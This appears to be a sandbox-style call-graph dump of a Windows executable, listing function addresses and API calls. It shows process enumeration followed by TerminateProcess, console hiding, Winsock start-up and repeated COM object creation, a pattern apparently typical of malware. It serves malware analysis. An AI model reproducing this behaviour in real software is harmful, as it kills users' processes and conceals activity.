7ff643f3eed0 50 API calls 42150->42151 42152 7ff643f39f69 42151->42152 42153 7ff643f3ece0 50 API calls 42152->42153 42154 7ff643f39fa2 42153->42154 42155 7ff643f3f4a0 50 API calls 42154->42155 42156 7ff643f39fb6 42155->42156 42157 7ff643f3f4a0 50 API calls 42156->42157 42158 7ff643f39fdb 42157->42158 42159 7ff643f3ece0 50 API calls 42158->42159 42160 7ff643f39fe8 42159->42160 42161 7ff643f3ece0 50 API calls 42160->42161 42162 7ff643f39ff5 42161->42162 42163 7ff643f3f4a0 50 API calls 42162->42163 42164 7ff643f3a040 42163->42164 42165 7ff643f42960 50 API calls 42164->42165 42166 7ff643f3a05b 42165->42166 42546 7ff643f3c790 42166->42546 42168 7ff643f3a09a 42558 7ff643f3c660 42168->42558 42170 7ff643f3a0c6 42569 7ff643f25d00 42170->42569 42172 7ff643f3a14f 42173 7ff643f3c660 47 API calls 42172->42173 42174 7ff643f3a15c 42173->42174 42175 7ff643f25d00 47 API calls 42174->42175 42176 7ff643f3a1e2 42175->42176 42177 7ff643f3c660 47 API calls 42176->42177 42178 7ff643f3a1ef 42177->42178 42179 7ff643f25d00 47 API calls 42178->42179 42180 7ff643f3a278 42179->42180 42181 7ff643f3c660 47 API calls 42180->42181 42182 7ff643f3a285 42181->42182 42183 7ff643f25d00 47 API calls 42182->42183 42184 7ff643f3a308 42183->42184 42185 7ff643f3c660 47 API calls 42184->42185 42186 7ff643f3a315 42185->42186 42187 7ff643f25d00 47 API calls 42186->42187 42188 7ff643f3a322 42187->42188 42189 7ff643f3c660 47 API calls 42188->42189 42190 7ff643f3a32f 42189->42190 42191 7ff643f25d00 47 API calls 42190->42191 42192 7ff643f3a3b8 42191->42192 42193 7ff643f3c660 47 API calls 42192->42193 42194 7ff643f3a3c5 42193->42194 42195 7ff643f25d00 47 API calls 42194->42195 42196 7ff643f3a42d 42195->42196 42197 7ff643f3c660 47 API calls 42196->42197 42198 7ff643f3a43a 42197->42198 42199 7ff643f25d00 47 API calls 42198->42199 42200 7ff643f3a4c0 42199->42200 42201 7ff643f3c660 47 API calls 42200->42201 42202 7ff643f3a4cd 42201->42202 42203 7ff643f25d00 47 API calls 42202->42203 42204 7ff643f3a550 42203->42204 42205 7ff643f3c660 47 API calls 42204->42205 42206 7ff643f3a55d 42205->42206 42207 7ff643f25d00 47 API calls 42206->42207 42208 7ff643f3a5e3 42207->42208 42574 7ff643f35ec0 42208->42574 42212 7ff643f3a5ed 42738 7ff643f27c50 42212->42738 42214 7ff643f3a605 42215 7ff643f3f4a0 50 API calls 42214->42215 42216 7ff643f3a619 42215->42216 42217 7ff643f25d00 47 API calls 42216->42217 42221 7ff643f3a621 42217->42221 42218 7ff643f3c2fb 42219 7ff643f3f4a0 50 API calls 42218->42219 42220 7ff643f3c30f 42219->42220 42222 7ff643f25d00 47 API calls 42220->42222 42221->42218 42223 7ff643f25d00 47 API calls 42221->42223 42227 7ff643f3a667 42221->42227 42224 7ff643f3c317 42222->42224 42223->42221 42225 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42224->42225 42226 7ff643f3c324 42225->42226 43843 7ff643f22370 50 API calls 3 library calls 42226->43843 42227->42218 42825 7ff643f3d0e0 42227->42825 42230 7ff643f3b22f 42232 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42230->42232 42231 7ff643f3c32a 42233 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42231->42233 42235 7ff643f3b260 42232->42235 42236 7ff643f3c330 42233->42236 42234 7ff643f3c354 43847 7ff643f22410 50 API calls std::_Throw_Cpp_error 42234->43847 43088 7ff643f44160 42235->43088 42241 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42236->42241 42239 7ff643f460e0 50 API calls 42434 7ff643f3a696 _Yarn messages memcpy_s std::_Locinfo::_Locinfo_ctor 42239->42434 42240 7ff643f3c35a 42243 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42240->42243 42242 7ff643f3c336 42241->42242 43844 7ff643f22410 50 API calls std::_Throw_Cpp_error 42242->43844 42244 7ff643f3c360 42243->42244 43848 7ff643f22410 50 API calls std::_Throw_Cpp_error 42244->43848 42245 7ff643f444a0 50 API calls std::_Throw_Cpp_error 42245->42434 42246 7ff643f3b2f0 42251 7ff643f41fe0 10 API calls 42246->42251 42247 7ff643f3b4c2 42255 7ff643f41fe0 10 API calls 42247->42255 42249 7ff643f3c342 42254 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42249->42254 42250 7ff643f3b292 messages 42250->42240 42250->42246 42250->42247 42256 7ff643f3b303 42251->42256 42252 7ff643f3c33c 42263 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42252->42263 42259 7ff643f3c348 42254->42259 42260 7ff643f3b4d5 42255->42260 42262 7ff643f422a0 87 API calls 42256->42262 43845 7ff643f22410 50 API calls std::_Throw_Cpp_error 42259->43845 42261 7ff643f422a0 87 API calls 42260->42261 42265 7ff643f3b4c0 42261->42265 42266 7ff643f3b30b 42262->42266 42263->42249 42270 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42265->42270 42271 7ff643f3f4a0 50 API calls 42266->42271 42269 7ff643f3c34e 43846 7ff643f22410 50 API calls std::_Throw_Cpp_error 42269->43846 42272 7ff643f3b50e 42270->42272 42273 7ff643f3b31e 42271->42273 43328 7ff643f2b600 42272->43328 42277 7ff643f3f4a0 50 API calls 42273->42277 42280 7ff643f3b332 42277->42280 43102 7ff643f26190 42280->43102 42308 7ff643f62a38 50 API calls std::_Facet_Register 42308->42434 42317 7ff643f3f4a0 50 API calls 42317->42434 42322 7ff643f25d00 47 API calls 42322->42434 42421 7ff643f58f10 67 API calls 42421->42434 42425 7ff643f574c0 58 API calls 42425->42434 42434->42224 42434->42226 42434->42230 42434->42231 42434->42234 42434->42236 42434->42239 42434->42242 42434->42245 42434->42249 42434->42252 42434->42259 42434->42269 42434->42308 42434->42317 42434->42322 42434->42421 42434->42425 42828 7ff643f2e790 42434->42828 42959 7ff643f408c0 42434->42959 42964 7ff643f3ec10 42434->42964 42969 7ff643f310f0 42434->42969 43072 7ff643f43ad0 42434->43072 43076 7ff643f30ff0 42434->43076 43805 7ff643f42c60 50 API calls 4 library calls 42434->43805 43806 7ff643f594c0 58 API calls 4 library calls 42434->43806 43807 7ff643f42ee0 50 API calls 3 library calls 42434->43807 43808 7ff643f58e50 42434->43808 43811 7ff643f45e60 50 API calls 3 library calls 42434->43811 43812 7ff643f3f4e0 42434->43812 43826 7ff643f446a0 42434->43826 43831 7ff643f321c0 127 API calls 7 library calls 42434->43831 43832 7ff643f32ef0 127 API calls 7 library calls 42434->43832 43833 7ff643f40370 42434->43833 42470->41797 42474 7ff643f3f060 42473->42474 42474->42474 42475 7ff643f44160 50 API calls 42474->42475 42476 7ff643f3845a 42475->42476 42477 7ff643f37970 42476->42477 43849 7ff643f63600 42477->43849 42479 7ff643f3797c K32EnumProcesses 42480 7ff643f379ad 42479->42480 42488 7ff643f379cf memcpy_s 42479->42488 43851 7ff643f41dc0 42480->43851 42481 7ff643f37a10 OpenProcess 42481->42488 42483 7ff643f379c8 42484 7ff643f62770 codecvt 8 API calls 42483->42484 42486 7ff643f37b70 42484->42486 42485 7ff643f37a6a K32EnumProcessModules 42487 7ff643f37a87 K32GetModuleBaseNameW 42485->42487 42485->42488 42498 7ff643f41fe0 42486->42498 42487->42488 42488->42481 42488->42483 42488->42485 42489 7ff643f37b2b CloseHandle 42488->42489 42490 7ff643f37b04 TerminateProcess 42488->42490 42489->42488 42491 7ff643f37b1b 42490->42491 42492 7ff643f41fe0 10 API calls 42491->42492 42493 7ff643f37b8c 42492->42493 42494 7ff643f41fe0 10 API calls 42493->42494 42495 7ff643f37b97 42494->42495 42496 7ff643f422a0 87 API calls 42495->42496 42497 7ff643f37b9f CloseHandle 42496->42497 42497->42483 42499 7ff643f42010 42498->42499 42500 7ff643f41160 10 API calls 42499->42500 42504 7ff643f4205f 42499->42504 42500->42504 42501 7ff643f4220e 42502 7ff643f3849c 42501->42502 43909 7ff643f412c0 RtlPcToFileHeader RaiseException _com_raise_error 42501->43909 42508 7ff643f42420 42502->42508 42504->42501 42505 7ff643f4224c 42504->42505 43910 7ff643f649c0 RtlPcToFileHeader RaiseException 42505->43910 42507 7ff643f4229f 42509 7ff643f4242b 42508->42509 42510 7ff643f41160 10 API calls 42509->42510 42513 7ff643f47096 42509->42513 42510->42513 42511 7ff643f384ab 42511->41780 42512 7ff643f4723a 42512->42511 43911 7ff643f412c0 RtlPcToFileHeader RaiseException _com_raise_error 42512->43911 42513->42512 42515 7ff643f47282 42513->42515 43912 7ff643f649c0 RtlPcToFileHeader RaiseException 42515->43912 42517 7ff643f472d7 42519 7ff643f422c8 42518->42519 43913 7ff643f472e0 42519->43913 42524 7ff643f41160 10 API calls 42525 7ff643f384be GetConsoleWindow ShowWindow WSAStartup 42524->42525 42525->41784 42525->41785 42527 7ff643f3ef11 42526->42527 42534 7ff643f3ef68 42526->42534 43947 7ff643f45e60 50 API calls 3 library calls 42527->43947 42529 7ff643f62770 codecvt 8 API calls 42530 7ff643f3859d 42529->42530 42530->41801 42531 7ff643f3ef5d 42532 7ff643f446a0 47 API calls 42531->42532 42532->42534 42533 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 42535 7ff643f3ef16 42533->42535 42534->42529 42535->42531 42535->42533 42537 7ff643f62a38 std::_Facet_Register 50 API calls 42536->42537 42538 7ff643f3861a 42537->42538 42538->41807 42540 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 42539->42540 42541 7ff643f4297f 42540->42541 43948 7ff643f429c0 42541->43948 42544 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 42545 7ff643f38803 42544->42545 42545->41833 42547 7ff643f62a38 std::_Facet_Register 50 API calls 42546->42547 42556 7ff643f3c7c5 42547->42556 42548 7ff643f3c8e6 42548->42168 42549 7ff643f3c904 44000 7ff643f239b0 50 API calls std::_Throw_Cpp_error 42549->44000 42551 7ff643f62a38 std::_Facet_Register 50 API calls 42551->42556 42552 7ff643f3f4e0 50 API calls std::_Throw_Cpp_error 42552->42556 42554 7ff643f429c0 50 API calls 42554->42556 42556->42548 42556->42549 42556->42551 42556->42552 42556->42554 42559 7ff643f3c676 messages 42558->42559 42560 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42559->42560 42561 7ff643f3c6d5 42560->42561 42562 7ff643f3c660 47 API calls 42561->42562 42564 7ff643f3c6f2 42562->42564 42563 7ff643f3c720 messages 42563->42170 42564->42563 42565 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42564->42565 42567 7ff643f3c746 messages 42565->42567 42568 7ff643f3c961 42567->42568 44001 7ff643f3c6e0 47 API calls 2 library calls 42567->44001 42570 7ff643f25d13 42569->42570 42571 7ff643f25d37 messages 42569->42571 42570->42571 42572 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42570->42572 42571->42172 42573 7ff643f25d5d 42572->42573 42575 7ff643f62a38 std::_Facet_Register 50 API calls 42574->42575 42576 7ff643f35f0f memcpy_s 42575->42576 42577 7ff643f35f47 GetModuleFileNameA 42576->42577 44002 7ff643f47bd0 50 API calls 5 library calls 42576->44002 42578 7ff643f35fe1 42577->42578 42579 7ff643f35f65 GetLastError 42577->42579 42580 7ff643f360a8 42578->42580 42581 7ff643f35fea GetLastError 42578->42581 42579->42576 42579->42578 42583 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42580->42583 42582 7ff643f36015 42581->42582 42582->42582 42584 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42582->42584 42586 7ff643f360ea 42583->42586 42635 7ff643f3602b messages 42584->42635 42587 7ff643f378e9 42586->42587 42588 7ff643f3610a 42586->42588 44004 7ff643f22410 50 API calls std::_Throw_Cpp_error 42587->44004 42590 7ff643f460e0 50 API calls 42588->42590 42591 7ff643f36148 messages 42590->42591 42593 7ff643f36185 CoInitializeEx 42591->42593 42636 7ff643f378ee 42591->42636 42592 7ff643f37955 42596 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42592->42596 42598 7ff643f36197 42593->42598 42599 7ff643f3629c CoCreateInstance 42593->42599 42594 7ff643f62770 codecvt 8 API calls 42597 7ff643f378cb 42594->42597 42595 7ff643f3795b 42600 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42595->42600 42596->42595 42708 7ff643f25d60 CreateToolhelp32Snapshot 42597->42708 42601 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42598->42601 42602 7ff643f363e0 VariantInit VariantInit VariantInit VariantInit 42599->42602 42603 7ff643f362d5 42599->42603 42604 7ff643f37961 42600->42604 42606 7ff643f361c0 42601->42606 42609 7ff643f36533 VariantClear VariantClear VariantClear VariantClear 42602->42609 42607 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42603->42607 42605 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42605->42592 42606->42635 42606->42636 42608 7ff643f362fe 42607->42608 42610 7ff643f3633b CoUninitialize 42608->42610 42615 7ff643f36336 messages 42608->42615 42608->42636 42611 7ff643f36578 42609->42611 42612 7ff643f36691 42609->42612 42621 7ff643f36063 messages 42610->42621 42610->42635 42613 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42611->42613 42614 7ff643f62a38 std::_Facet_Register 50 API calls 42612->42614 42616 7ff643f365a1 42613->42616 42617 7ff643f366b2 42614->42617 42615->42610 42618 7ff643f365d9 messages 42616->42618 42616->42636 42619 7ff643f366bf SysAllocString 42617->42619 42622 7ff643f366ef 42617->42622 42620 7ff643f365ec CoUninitialize 42618->42620 42619->42622 42619->42636 42620->42621 42620->42635 42621->42595 42623 7ff643f36096 messages 42621->42623 42626 7ff643f3672d SysFreeString 42622->42626 42627 7ff643f36736 messages 42622->42627 42622->42636 42623->42594 42624 7ff643f3675d 42628 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42624->42628 42625 7ff643f36880 42629 7ff643f62a38 std::_Facet_Register 50 API calls 42625->42629 42626->42627 42627->42624 42627->42625 42630 7ff643f36786 42628->42630 42631 7ff643f36899 42629->42631 42632 7ff643f367be messages 42630->42632 42630->42636 42633 7ff643f368a6 SysAllocString 42631->42633 42637 7ff643f368d6 42631->42637 42634 7ff643f367d1 CoUninitialize 42632->42634 42633->42636 42633->42637 42634->42621 42634->42635 42635->42592 42635->42621 42636->42605 42637->42636 42638 7ff643f3690e SysFreeString 42637->42638 42639 7ff643f36917 messages 42637->42639 42638->42639 42640 7ff643f36a91 42639->42640 42641 7ff643f3696e 42639->42641 42645 7ff643f36be8 42640->42645 42646 7ff643f36ab7 42640->42646 42642 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42641->42642 42643 7ff643f36997 42642->42643 42643->42636 42644 7ff643f369cf messages 42643->42644 42648 7ff643f369e2 CoUninitialize 42644->42648 42651 7ff643f36d58 42645->42651 42652 7ff643f36c27 42645->42652 42647 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42646->42647 42649 7ff643f36ae0 42647->42649 42648->42621 42648->42635 42649->42636 42650 7ff643f36b18 messages 42649->42650 42654 7ff643f36b39 CoUninitialize 42650->42654 42657 7ff643f36ec0 42651->42657 42658 7ff643f36d8f 42651->42658 42653 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42652->42653 42655 7ff643f36c50 42653->42655 42654->42621 42654->42635 42655->42636 42656 7ff643f36c88 messages 42655->42656 42661 7ff643f36ca9 CoUninitialize 42656->42661 42663 7ff643f36ef8 42657->42663 42664 7ff643f37029 42657->42664 42659 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42658->42659 42660 7ff643f36db8 42659->42660 42660->42636 42662 7ff643f36df0 messages 42660->42662 42661->42621 42661->42635 42666 7ff643f36e11 CoUninitialize 42662->42666 42665 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42663->42665 42669 7ff643f37196 42664->42669 42670 7ff643f37065 42664->42670 42667 7ff643f36f21 42665->42667 42666->42621 42666->42635 42667->42636 42668 7ff643f36f59 messages 42667->42668 42673 7ff643f36f7a CoUninitialize 42668->42673 42672 7ff643f62a38 std::_Facet_Register 50 API calls 42669->42672 42671 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42670->42671 42674 7ff643f3708e 42671->42674 42675 7ff643f371c9 42672->42675 42673->42621 42673->42635 42674->42636 42676 7ff643f370c6 messages 42674->42676 42678 7ff643f371f5 42675->42678 44003 7ff643f62440 25 API calls 3 library calls 42675->44003 42679 7ff643f370e7 CoUninitialize 42676->42679 42678->42636 42680 7ff643f3722f SysFreeString 42678->42680 42681 7ff643f37238 messages 42678->42681 42679->42621 42679->42635 42680->42681 42682 7ff643f3726d 42681->42682 42689 7ff643f3739e SysAllocString 42681->42689 42683 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42682->42683 42684 7ff643f37296 42683->42684 42684->42636 42685 7ff643f372ce messages 42684->42685 42692 7ff643f372ef CoUninitialize 42685->42692 42687 7ff643f37438 VariantInit SysAllocString 42687->42636 42688 7ff643f374af 42687->42688 42690 7ff643f62a38 std::_Facet_Register 50 API calls 42688->42690 42689->42636 42689->42687 42691 7ff643f374e0 42690->42691 42693 7ff643f374f0 SysAllocString 42691->42693 42694 7ff643f37520 42691->42694 42692->42621 42692->42635 42693->42636 42693->42694 42694->42636 42695 7ff643f37620 VariantClear VariantClear VariantClear 42694->42695 42698 7ff643f375f7 SysFreeString 42694->42698 42702 7ff643f37600 messages 42694->42702 42696 7ff643f37666 42695->42696 42697 7ff643f3778e 42695->42697 42703 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42696->42703 42699 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42697->42699 42698->42702 42700 7ff643f377a5 42699->42700 42700->42636 42701 7ff643f377dd messages 42700->42701 42707 7ff643f3780c CoUninitialize 42701->42707 42702->42695 42704 7ff643f37686 42703->42704 42704->42636 42705 7ff643f376be messages 42704->42705 42706 7ff643f376df CoUninitialize 42705->42706 42706->42621 42706->42635 42707->42621 42707->42635 42709 7ff643f25db1 42708->42709 42710 7ff643f25e20 Process32FirstW 42708->42710 42712 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42709->42712 42711 7ff643f25fe4 CloseHandle 42710->42711 42735 7ff643f25e40 messages 42710->42735 44005 7ff643f239d0 42711->44005 42732 7ff643f25ddc 42712->42732 42714 7ff643f25e14 messages 42718 7ff643f62770 codecvt 8 API calls 42714->42718 42716 7ff643f26180 42719 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42716->42719 42717 7ff643f44160 50 API calls 42717->42735 42721 7ff643f26119 42718->42721 42722 7ff643f26185 42719->42722 42720 7ff643f239d0 2 API calls 42730 7ff643f26028 42720->42730 42721->42212 42723 7ff643f2609f 42724 7ff643f260bb 42723->42724 42725 7ff643f2613a 42723->42725 42727 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42724->42727 42726 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42725->42726 42726->42732 42727->42732 42728 7ff643f25fce Process32NextW 42728->42711 42728->42735 42729 7ff643f25f20 OpenProcess 42729->42728 42729->42735 42730->42723 42731 7ff643f26084 Sleep 42730->42731 42733 7ff643f239d0 2 API calls 42731->42733 42732->42714 42732->42716 42733->42730 42734 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42734->42735 42735->42716 42735->42717 42735->42728 42735->42729 42735->42734 42736 7ff643f25fb0 TerminateProcess CloseHandle 42735->42736 42737 7ff643f25fab messages 42735->42737 42736->42728 42737->42736 42739 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42738->42739 42740 7ff643f27cba 42739->42740 44012 7ff643f5e0b4 42740->44012 42747 7ff643f5e0b4 __std_fs_code_page 48 API calls 42749 7ff643f27d7f 42747->42749 42751 7ff643f23ab0 52 API calls 42749->42751 42750 7ff643f28485 42752 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42750->42752 42753 7ff643f27d97 42751->42753 42757 7ff643f2848b 42752->42757 42758 7ff643f255a0 66 API calls 42753->42758 42754 7ff643f27db1 messages 42754->42750 42755 7ff643f27ea1 42754->42755 42756 7ff643f283a5 42754->42756 42754->42757 42765 7ff643f2845e 42754->42765 42769 7ff643f2846f 42754->42769 42759 7ff643f5e0b4 __std_fs_code_page 48 API calls 42755->42759 44054 7ff643f46670 10 API calls _com_raise_error 42756->44054 42761 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42757->42761 42758->42754 42760 7ff643f27ec0 42759->42760 42763 7ff643f23ab0 52 API calls 42760->42763 42764 7ff643f28491 42761->42764 42811 7ff643f27ed9 messages 42763->42811 42768 7ff643f24d50 54 API calls 42764->42768 44056 7ff643f24d50 42765->44056 42766 7ff643f283d2 42771 7ff643f41dc0 50 API calls 42766->42771 42770 7ff643f284a5 42768->42770 44064 7ff643f24dc0 54 API calls _com_raise_error 42769->44064 42772 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42770->42772 42781 7ff643f28331 42771->42781 42773 7ff643f284ab 42772->42773 42777 7ff643f24d50 54 API calls 42773->42777 42774 7ff643f2841c messages 42775 7ff643f62770 codecvt 8 API calls 42774->42775 42776 7ff643f28430 42775->42776 42776->42214 42780 7ff643f284bc 42777->42780 42778 7ff643f28451 42779 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42778->42779 42783 7ff643f28456 42779->42783 42784 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42780->42784 42781->42774 42781->42778 44055 7ff643f24c60 53 API calls 3 library calls 42783->44055 42785 7ff643f284c2 42784->42785 42788 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42785->42788 42789 7ff643f284c8 42788->42789 42790 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42789->42790 42791 7ff643f284ce 42790->42791 42792 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42791->42792 42793 7ff643f284d4 CoInitialize CoCreateInstance 42792->42793 42795 7ff643f28548 42793->42795 42812 7ff643f285ab messages 42793->42812 42796 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42795->42796 42823 7ff643f28569 42796->42823 42798 7ff643f41dc0 50 API calls 42798->42811 42799 7ff643f2883a 42801 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42799->42801 42800 7ff643f62770 codecvt 8 API calls 42802 7ff643f28823 42800->42802 42803 7ff643f2883f 42801->42803 42802->42214 42805 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42803->42805 42804 7ff643f28845 42806 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42804->42806 42805->42804 42807 7ff643f2884b 42806->42807 42808 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42807->42808 42810 7ff643f28851 42808->42810 42809 7ff643f44160 50 API calls 42809->42811 42810->42214 42811->42764 42811->42770 42811->42773 42811->42780 42811->42781 42811->42783 42811->42785 42811->42789 42811->42791 42811->42798 42811->42809 42813 7ff643f23f60 56 API calls 42811->42813 44038 7ff643f24e20 42811->44038 44044 7ff643f24f80 42811->44044 44052 7ff643f46670 10 API calls _com_raise_error 42811->44052 44053 7ff643f47d80 50 API calls 4 library calls 42811->44053 42812->42804 42812->42807 42815 7ff643f286a9 42812->42815 42816 7ff643f28716 42812->42816 42813->42811 42817 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42815->42817 42819 7ff643f2879a CoUninitialize 42816->42819 42820 7ff643f2873a 42816->42820 42822 7ff643f286ce messages 42817->42822 42818 7ff643f28709 CoUninitialize 42818->42823 42819->42823 42821 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42820->42821 42821->42822 42822->42803 42822->42818 42823->42799 42824 7ff643f2859f messages 42823->42824 42824->42800 42826 7ff643f62a38 std::_Facet_Register 50 API calls 42825->42826 42827 7ff643f3d0fc 42826->42827 42827->42434 42829 7ff643f2e7f5 42828->42829 42830 7ff643f30e22 42828->42830 42833 7ff643f460e0 50 API calls 42829->42833 44240 7ff643f22410 50 API calls std::_Throw_Cpp_error 42830->44240 42832 7ff643f30e28 42835 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42832->42835 42834 7ff643f2e826 42833->42834 42836 7ff643f408c0 std::_Throw_Cpp_error 50 API calls 42834->42836 42837 7ff643f30e2e 42835->42837 42838 7ff643f2e841 messages 42836->42838 42839 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42837->42839 42838->42832 42840 7ff643f5e0b4 __std_fs_code_page 48 API calls 42838->42840 42841 7ff643f30e34 42839->42841 42842 7ff643f2e915 42840->42842 44241 7ff643f24dc0 54 API calls _com_raise_error 42841->44241 42843 7ff643f23ab0 52 API calls 42842->42843 42844 7ff643f2e93d 42843->42844 42846 7ff643f255a0 66 API calls 42844->42846 42850 7ff643f2e95d messages 42846->42850 42847 7ff643f30e51 42848 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42847->42848 42849 7ff643f30e57 42848->42849 42853 7ff643f24d50 54 API calls 42849->42853 42850->42837 42850->42841 42851 7ff643f2eae9 42850->42851 42852 7ff643f2e9fd 42850->42852 42855 7ff643f5e0b4 __std_fs_code_page 48 API calls 42851->42855 42856 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42852->42856 42854 7ff643f30e6e 42853->42854 42859 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42854->42859 42857 7ff643f2eb20 42855->42857 42872 7ff643f2ea32 messages 42856->42872 42858 7ff643f23ab0 52 API calls 42857->42858 42893 7ff643f2eb48 _Yarn messages memcpy_s 42858->42893 42860 7ff643f30e74 42859->42860 42863 7ff643f24d50 54 API calls 42860->42863 42861 7ff643f2eab4 messages 42862 7ff643f62770 codecvt 8 API calls 42861->42862 42865 7ff643f2eacc 42862->42865 42866 7ff643f30e84 42863->42866 42864 7ff643f30e1d 42867 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42864->42867 42865->42434 44242 7ff643f22410 50 API calls std::_Throw_Cpp_error 42866->44242 42867->42830 42869 7ff643f30e8a 44243 7ff643f22410 50 API calls std::_Throw_Cpp_error 42869->44243 42871 7ff643f30e90 44244 7ff643f22410 50 API calls std::_Throw_Cpp_error 42871->44244 42872->42847 42872->42861 42872->42864 42874 7ff643f30d51 42874->42872 42957 7ff643f487b0 48 API calls 42874->42957 42875 7ff643f30e96 42876 7ff643f24d50 54 API calls 42875->42876 42877 7ff643f30ead 42876->42877 44245 7ff643f24dc0 54 API calls _com_raise_error 42877->44245 42880 7ff643f30eca 42882 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42880->42882 42881 7ff643f30fef 42884 7ff643f30ecf 42882->42884 42883 7ff643f460e0 50 API calls 42883->42893 42885 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42884->42885 42886 7ff643f30ed5 42885->42886 42888 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42886->42888 42887 7ff643f62a38 50 API calls std::_Facet_Register 42887->42893 42890 7ff643f30edb 42888->42890 42889 7ff643f406d0 50 API calls 42889->42893 44246 7ff643f649c0 RtlPcToFileHeader RaiseException 42890->44246 42892 7ff643f30f36 42895 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42892->42895 42893->42849 42893->42854 42893->42860 42893->42866 42893->42869 42893->42871 42893->42874 42893->42875 42893->42877 42893->42880 42893->42883 42893->42884 42893->42886 42893->42887 42893->42889 42893->42890 42893->42892 42894 7ff643f255a0 66 API calls 42893->42894 42896 7ff643f30f3c 42893->42896 42898 7ff643f30f42 42893->42898 42900 7ff643f30f48 42893->42900 42901 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 42893->42901 42902 7ff643f5e440 66 API calls 42893->42902 42904 7ff643f30f4e 42893->42904 42906 7ff643f30f6b 42893->42906 42907 7ff643f3fa80 116 API calls 42893->42907 42909 7ff643f30f71 42893->42909 42912 7ff643f30f8e 42893->42912 42913 7ff643f23ab0 52 API calls 42893->42913 42915 7ff643f30fa5 42893->42915 42917 7ff643f30fab 42893->42917 42918 7ff643f52ae0 70 API calls 42893->42918 42920 7ff643f30fbb 42893->42920 42921 7ff643f5e0b4 48 API calls __std_fs_code_page 42893->42921 42922 7ff643f44160 50 API calls 42893->42922 42924 7ff643f30ff0 47 API calls 42893->42924 42926 7ff643f30fc1 42893->42926 42928 7ff643f23f60 56 API calls 42893->42928 42930 7ff643f30fcf 42893->42930 42931 7ff643f30fc7 42893->42931 42932 7ff643f30fd5 42893->42932 42934 7ff643f30fdb 42893->42934 42937 7ff643f30fe1 42893->42937 42940 7ff643f30fe7 42893->42940 42941 7ff643f57c70 58 API calls 42893->42941 42943 7ff643f24f80 52 API calls 42893->42943 42944 7ff643f59690 58 API calls 42893->42944 42945 7ff643f3e550 81 API calls 42893->42945 42946 7ff643f3f4a0 50 API calls 42893->42946 42950 7ff643f58e50 50 API calls 42893->42950 42951 7ff643f25d00 47 API calls 42893->42951 42953 7ff643f40370 47 API calls 42893->42953 42954 7ff643f592e0 58 API calls 42893->42954 42955 7ff643f57420 56 API calls 42893->42955 42956 7ff643f42ee0 50 API calls 42893->42956 44190 7ff643f3ffc0 42893->44190 44196 7ff643f487b0 42893->44196 44202 7ff643f47870 42893->44202 44231 7ff643f3f300 47 API calls 2 library calls 42893->44231 44232 7ff643f58500 58 API calls codecvt 42893->44232 44233 7ff643f57af0 42893->44233 44237 7ff643f596c0 58 API calls 4 library calls 